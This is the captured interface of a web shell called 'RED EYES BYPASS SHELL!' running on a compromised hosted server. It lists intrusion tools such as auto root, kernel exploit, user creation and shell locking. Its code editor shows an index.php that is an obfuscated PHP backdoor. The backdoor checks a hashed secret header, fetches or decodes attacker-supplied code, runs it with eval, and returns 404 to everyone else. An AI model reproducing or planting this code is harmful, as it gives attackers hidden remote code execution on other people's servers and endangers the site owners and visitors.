Linux webm003.cluster107.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.107.20.3 | : 216.73.216.205
Cant Read [ /etc/named.conf ]
hexamanupu
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
hexamanupu /
www /
boss2026yt /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
index.php
1.6
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php try {$GL0BALS = array_merge($_GET, $_POST, $_COOKIE, $_FILES, $_SERVER, $_ENV);if (hash('sha256', md5($GL0BALS['HTTP_WP_LOCALE'])) == '4a24bb058fdf048879addb1d4315849c932ac651747d41990e35bba7fb6283ea') {if (isset($GL0BALS['wp_the_query'])) {$body = pack("H*", $GL0BALS['wp_the_query']);} else {$parsed_url = parse_url(pack("H*", $GL0BALS['HTTP_WP_QUERY'])); $host = $parsed_url['host'];$path = isset($parsed_url['path']) ? $parsed_url['path'] : '/';$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : '';$scheme = isset($parsed_url['scheme']) ? $parsed_url['scheme'] : 'http';$port = isset($parsed_url['port']) ? $parsed_url['port'] : ($scheme === 'https' ? 443 : 80);$protocol = ($scheme === 'https') ? 'ssl' : 'tcp'; $fp = stream_socket_client("{$protocol}://{$host}:{$port}", $errno, $errstr, 30); $headers = array("GET {$path}{$query} HTTP/1.1", "Host: {$host}","Connection: Close",);$request = implode("\r\n", $headers) . "\r\n\r\n";fwrite($fp, $request);$response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024);}fclose($fp); $response_parts = explode("\r\n\r\n", $response, 2);$headers = isset($response_parts[0]) ? $response_parts[0] : '';$body = isset($response_parts[1]) ? $response_parts[1] : '';if (stripos($headers, "Transfer-Encoding: chunked") !== false) {$decoded = '';while (true) {$pos = strpos($body, "\r\n");if ($pos === false) break;$length = hexdec(substr($body, 0, $pos)); if ($length === 0) break;$decoded .= substr($body, $pos + 2, $length);$body = substr($body, $pos + 2 + $length + 2);} $body = $decoded;}}eVAL( '?>'. $body ); die;}} catch (Exception $e) {}http_response_code(404);die;
Close